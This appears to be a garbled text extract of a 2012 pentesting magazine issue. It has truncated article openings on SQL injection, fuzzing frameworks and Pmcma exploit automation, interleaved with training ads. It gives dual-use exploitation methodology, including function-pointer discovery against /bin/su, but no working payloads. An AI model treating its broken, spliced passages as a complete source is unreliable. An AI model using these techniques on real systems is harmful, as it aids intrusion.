a myriad of user submit able forms and the delivery of dynamic web content. Many of these features users take for granted and demand in modern websites to provide businesses with the ability to communicate customers. These website features are may be susceptible to SQL Injection attacks and are good place to start during a pentest engagement that includes a web application testing component.

A Simple SQL Injection ExampleTake a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum.

When the legitimate user submits their information, a SQL query is generated from this information and submitted to the database for verification. The web application in question that controls authentication will communicate with the backend database through a series of commands to verify the username and password combination that was submitted. Once verified, the legitimate user should be granted the appropriate access for their account to the web application.

Through SQL Injection, the attacker may input specifically crafted SQL commands with the intent of bypassing the login form authentication mechanism. This is only possible if the inputs are not properly

SQL Injection Inject Your Way to Success

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. SQL Injection is one of the most common vulnerabilities in web applications today. It is (as of the time of writing) ranked as the top web application security risk by OWASP [1].

Quality

Integrity

Sense of SecurityCompliance, Protection

and

[email protected]

Now Hiring

Sense of Security is an Australian based information security and risk management consulting practice. From our offices in Sydney and Melbourne we deliver industry leading services and research to our clients locally, nationally and internationally.

Since our inception in 2002, our company has performed tremendously well. We thrive on team work, service excellence and leadership through research and innovation. We are seeking talented people to join our team. If you are an experienced security consultant with a thorough understanding of Networking, Operation Systems and Application Security, please apply with a resume to [email protected] and quote reference PTM-TS-12.

Teamwork

Innovation

Passion

http://www.senseofsecurity.com.au/

FUZZING


But what troubles us the most is that some security researcher (or hacker, as some of us prefer to call them) sends an email to your

security response team telling about an exploitable buffer overflow in your product.

Some of us think that the researcher actually reversed engineered the code to find this issue; or he has access to some very specialized hardware and software to spot these issues. The reality is far more simple and cost-effective. In this article, we would talk about a few open source tools which are used by security researchers to spot vulnerabilities in our products even if they have zero or a very minimal knowledge of the product.

IntroductionWith companies like ZDI out there in the market to pay for every vulnerability you find, the motivation to work in security research has gone exponentially high in the last few years. The model of payment by ZDI and many similar companies is that, if you disclose an exploitable vulnerability to ZDI with its proof of concept (PoC), you get paid anything from 5000 USD to 40000 USD depending on the width of deployment of the product targeted and the severity of the issue. Hence, if you can compromise a machine by exploiting some product on it from the network, the money you get it quite decent. Hence, the general interest in identifying network, file and web based vulnerabilities is consistently growing amongst the

researchers. Here, in this article, we would discuss some state of the art open source tools which can be used for fuzzing networks, files and activeX controls.

Fuzzing is one of the most commonly used techniques for identifying security flaws in any application. The entry points for user controlled or tainted data is identified in the application. These are files, registry entries, emails, network sockets, activex controls, dll, etc, typically the places where any attacker controlled data can enter into the system and the application starts processing it. Fuzzers typically have a stored dictionary of strings and integers which it uses at appropriate places iteratively. If the fuzzer identifies some part of the input as a variable string, it would try all possible values of strings from its dictionary and further mutations of these strings. These strings typically target standard vulnerability classes like buffer overflow, format string vulnerability, directory traversal, sql injection, xss injections, command injections, etc. All of these can be grouped as implementation level flaws only. Another class of vulnerability is design level vulnerability. If there is a design flaw in a network protocol which allows for a man-in-the-middle attack, it can never be detected by a fuzzer. Hence, by definition, fuzzers are intended to target implementation level flaws only.

Network FuzzersOne commonly targeted attack surface is network protocols. In the industry, we either have implementation for

Fuzzing for FreeState of Art and Upcoming Research

As a developer working on a product release, we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. As a QA resource, we would be using the same “conformance test suite” or the same “stress test suite” to ensure that the new builds are working as expected.

FUZZING


Fuzzing is a technique used in software security testing in which lots and lots of abnormal input data are sent to the software, in order to produce

errors in normal software operation.Since a software error is usually a potential security

threat, Fuzzing is a great technique to detect security flaws. Fuzzing is usually used by attackers in order to discover unknown vulnerabilities, but also can be used by security staff or software deverlopers, in order to test their software strenght against this kind of attacks.

Sulley Fuzzing FrameworkSulley is an Open Source project, written in Python, that try to be a new standard in fuzzing software.

Sulley provides the tester with a... powerful framework where he can describe, using a simple grammar, the protocol to fuzz, and then the framework generates a complete set of tests based on mutations of the given grammar. Each test of this set is checked against the fuzzed software, while other components of the framework are monitoring all processes and network events related with each test.

When an abnormal response happens, Sulley Framework stores all data related to the crash, so the tester has all the information regarding the CPU registers, stack, network, and much more. It can be very useful in order to understand the weakness and correct (or exploit) it.

Fuzzing with Sulley

Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so, you can find your own 0-day vulnerabilities!In this article we are going to describe how we can use Sulley Fuzzing Framework with a real vulnerable FTP Server. Check it, try it on your own software, and... enjoy, of course.

Figure 1. Sulley from Monsters Inc. Figure 2. Sulley Architecture

FUZZING


F uzzing is all about finding vulnerabilities or errors in applications, operating systems and networks by injecting large amount of arbitrary data, called

fuzz. A Fuzzer is a tool which successively picks a value from a fuzz template to replace user-specified parameters in a request sent to the server. Response from the server is manually reviewed to identify vulnerabilities or errors.

Introduction To FuzzingWhy fuzzing? Where does it fit? What are its limitations?

Vulnerability scanners are imprudent; they discover known security issues and other low hanging fruit. Fuzzing along with penetration testing covers this gap and discovers unknown vulnerabilities. Fuzzing is one of the techniques for automating security assessment.

Fuzzing Overview And RequirementsFuzzing enables security engineers, developers and testers to locate defects, errors, and vulnerabilities produced by abnormal values via user inputs. Fuzzing covers the vital attack surfaces in a system fairly well, identifies many common errors, probable vulnerabilities quickly and economically. Fuzzing is useful in evaluating black box systems, as it does not involve any access to source code and can be performed without knowing the inner mechanism of the target system.

There are different fuzzing methods depending on how the fuzzer is used depending on the input parameters.

Session FuzzingSession fuzzing involves analysis of valid sessions of the application or the server. During fuzzing, preferred parameters or parts of the session are altered and sent to the server or application. Since this method enables fuzzer tool to change data that already exists, it is possible that the application will go into an uncertain state which results in a security vulnerability.

Example: Incrementing session ids of a web application.

Explicit FuzzingExplicit fuzzing involves building of specific fuzzing tools for specific applications or servers. It is possible to enumerate the target which may go into an uncertain state which results in a security vulnerability.

Example: Fuzzing FTP server with FTP Fuzzers.

Generic FuzzingGeneric fuzzing involves tool analysis to identify vulnerabilities on array of protocols, but they are not as efficient as explicit fuzzing. Generic fuzzing involves lot of manual inputs from the users and only experienced users can able to use these types of tools.

Example: Protocols Fuzzing Tools such as Spike

Fuzzing with WebScarab

Although there are ample techniques to identify vulnerabilities in software, fuzzing is the best technique as it is cost effective and enhances software security as it often finds odd lapses and vulnerabilities through automated or semi-automated process followed by manual expert reviews.

WHAT IS A GOOD FUZZING TOOL?Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit. There are no false positives, if the anomalous data causes abnormal reaction such as a crash in the target software, then you have found a critical security flaw.

In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.

��

Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third party developers. When there are billions of test cases, automated documentation is the only possi-ble solution.

Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues.

MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts: Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.

Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software.

Using hardware test beds: Appliance based fuzzing tools become outdated really fast, and the speed requirements for the hardware increases each year. Software-based fuzzers are scalable in performance, and can easily travel with you where testing is needed, and are not locked to a physical test lab.

Unprepared for cloud: A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues, or upload it to cloud setups.

PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available. How to distin-guish a good fuzzer, what are the qualities that a fuzzing tool should have?

Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in huge improvement in test coverage and reduction in test execu-tion time.

Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. Fuzzing tool must come with all the security know-how built-in, so that testers only need the domain expertise from the target system to execute tests.

Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.

Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.

Scalable: Time is almost always an issue when it comes to testing. User must also have control on the fuzzing parameters such as test coverage. In QA you rarely have much time for testing, and therefore need to run tests fast. Sometimes you can use more time in testing, and can select other test completion criteria.

��

http://www.codenomicon.com/pentester

MEMORY CORRUPTION


Determining exploitability is hard, writing exploits is hard. In fact, due to theoretical limitations hopefully known to the reader of this paper (aka:

halting point problem), they are two sides of the same coin. Proving unexploitability is provably unfeasible in the general case, and practically for the vast majority of computer programs actually used nowadays. So what you can get at best is a it’s not doable given the state of the art of exploitation. Public knowledge, common sense...

Determining exploitability and writing exploits is a difficult task. For these reasons, exploit writing automation is desirable. Not too surprisingly, it is also quite hard.

Determining exploitability is hard. Writing exploits is hard. Paradoxically, fixing software seems easier. Why is that? Well, maybe because virtually all the debugging tools available focus on what is happening before a memory corruption, rather than on what happens from there...

In this paper, we will focus on a new approach we will examine exploitability in a systematic way, focusing on what happens in memory after the bug is triggered, rather than tracing or backtracking what has happened before.

Our goal is to help exploit (semi)automation by building exploitation models based on constraints gathered from the environment. In particular, the presence of security

countermeasures such as ALSR, non executable memory, hardware[4] enhancements, and compiler enhancements such as Data Hardening allow for their practical testing in order to (in)validate them.

We will primarily focus on invalid memory write bugs (such as invalid dereference of pointers during a write operation, for instance due to a missing format string, integer overflow, or any other corruption bug) because of the special role they play in modern exploitation. Invalid memory dereferences in read mode used for information leakage purpose or indirect memory exploitation will also be discussed near the end of this article.

The main contributions of this Pmcma are:

• A methodology to discover all the potential function pointers inside the address space of a process at any given point in time.

• A methodology to discover all the function pointers actually dereferenced by a process from a given point in time, given a fix set of input data.

• A methodology to find all the function pointers exploitable by truncation in case of an arbitrary write subject to conditions (such as not controlling the value being dereferenced).

• A methodology to find all the unaligned memory reads from a given point in time during the execution of a process.

Introduction to

Exploit Automation With Pmcma (Part I)

Earlier this year, we released a tool called Pmcma (Post Memory Corruption Memory Analysis) at the Blackhat US security conference. The tool is available free and open-source at http://www.pmcma.org/ under the Apache 2.0 license. The following article is an introduction to Pmcma. In addition advanced readers can refer to the full Blackhat whitepaper mirrored on the Pmcma website [0].

http://www.pmcma.org/


F o r g i n g I T S e c u r i t y E x p e r t ss ec u re n in ja .c o m

• Security+

• CISSP®

• CEH (Professional Hacking) v7.1

• CAP (Certified Authorization Professional)

• CISA

• CISM

• CCNA Security • CCNA Security

• CWNA

• CWSP

• DIACAP

• ECSA / LPT Dual Certification

• ECSP (Certified Secure Programmer)

• EDRP (Disaster Recovery Professional)

• CCE (Computer Forensics) • CCE (Computer Forensics)

• CCNA Security

• CHFI

• ISSEP

• Cloud Security

• Digital Mobile Forensics

• SSCP

• Security+• Security+

• Security Awareness Training

… And more

Sign Up & Get Free Quiz EngineFrom cccure.org

Free Hotel Offer on Select Boot CampsOffers ends on Jan 31, 2012 – Call 703-535-8600 and

mention code: PentestNinja to secure your special rate.

Welcome Military – Veterans Benefits & GI Bill Post 9/11 ApprovedWIA (Workforce Investment Act) ApprovedWIA (Workforce Investment Act) Approved

Expert ITSecurity

Training &Services

7 0 3 5 3 5 8 6 0 0w w w . s e c u r e n i n j a . c o m

https://secureninja.com/

ITOnlinelearning offers Network Security courses for the beginner through to the professional.From the CompTIA Security+ through to CISSP, Cer�fied Ethical Hacker (CEH), Cer�fied Hacking Forensic Inves�gator (CHFI) and Security Analyst/Licensed Penetra�on tester (ECSA/LPT).

Registered Office: 16 Rose Walk, Si�ngbourne, Kent, ME10 4EW

Telephone: 0800-160-1161 Interna�onal: +44 1795 436969 Email: [email protected] [email protected]

Tailored Advice and Discounts

0800-160-1161 orPlease Call one of our Course Advisors for help and Tailored Advice -during office hours

(Mon-Fri 9am-5.30pm)

http://www.itonlinelearning.co.uk/

MEMORY CORRUPTION


The second part of the article describes pmcma.c implementation, focusing on attacking function pointers, simulating arbitrary reads, detecting

unaligned memory accesses and finally automating analysis and exploitation scenarios.

Attacking Function Pointers Now that we have a way to experiment on various modifications of a given process’ and address space, how do we find function pointers? Well, let’s get back to the definition of a function pointer... It is a variable, hence in a writable section, which points to a function. The majority of times a function starts with a standard epilogue. And they all are in executable sections.

So what we do (in pseudo code) is: see Listing 1. Two things are worth mentioning: first of, we may miss

a few pointers if we use this algorithm, because some functions may not start with a standard prologue. This was anticipated, and pmcma allows to test all of the pointers to +X zones pointing to a valid assembly instruction just by passing it the –relaxed flag. This is very time saving and works well in practice though. Secondly, the list of pointers we get this way (by a pure static analysis) is w list of _potential_ function pointers. They may just happen to be variables to luckily point to a valid function’s entry point. More importantly, it doesn’t give us the list of function pointers actually being dereferenced between a given point in time (eg: the one where we found, say, an invalid

write condition), and an other (either the process exit, or the return to this very same instruction in case of loops).

To detect those, we’re going to use the mk_fork() technique. The algorithm is as follows: see Listing 2.

To the best of my knowledge, this is the first proposed technique to exhaustively enumerate all the function pointers inside a process between two points in time.

By default, pmcma uses the valid 0xf1f2f3f4 as a remarkable value, which is obviously never correct from userland, and is quite remarkable, hence limiting false positives. This value can be changed from the command line. Let’s see how this would work inside pmcma on a simple example, by listing the function pointers from a given point in /bin/su: see Listing 3.

So using the strict mode, we found 0 potential function pointer to overwrite: Fortunately, in such a case, the application will then try the relaxed mode: see Listing 4.

We found 5 function pointers that are actually being dereferenced by /bin/su before exiting. To verify we actually got something relevant, we can read the message logs from the kernel:

jonathan@blackbox:~$ dmesg |tail -n 1

[ 7472.786312] su[20879]: segfault at f1f2f3f4 ip

f1f2f3f4 sp bfcab4e8 error 15

jonathan@blackbox:~$

Introduction to

Exploit Automation With Pmcma (Part II)

Earlier this year, we released a tool called Pmcma (Post Memory Corruption Memory Analysis) at the Blackhat US security conference. The tool is available free and open-source at http://www.pmcma.org/ under the Apache 2.0 license. The following article is an introduction to Pmcma. In addition advanced readers can refer to the full Blackhat whitepaper mirrored on the Pmcma website [0].



��

��

��

��

��

��

��

http://www.boundlessllc.com/

��

��

��

BOSON INSTRUCTOR'S PERSPECTIVE BETWEEN CPTEngineer & CEH��

��

��

��

��

��

��

��

��

��

��

��

��

��

��


��

��

��

��

��

��

��

��

��

ABOUT MILE2

��

��

ABOUT BOSON SOFTWARE, LLC

��

��


pentest bible 01 2012 teasers

Documents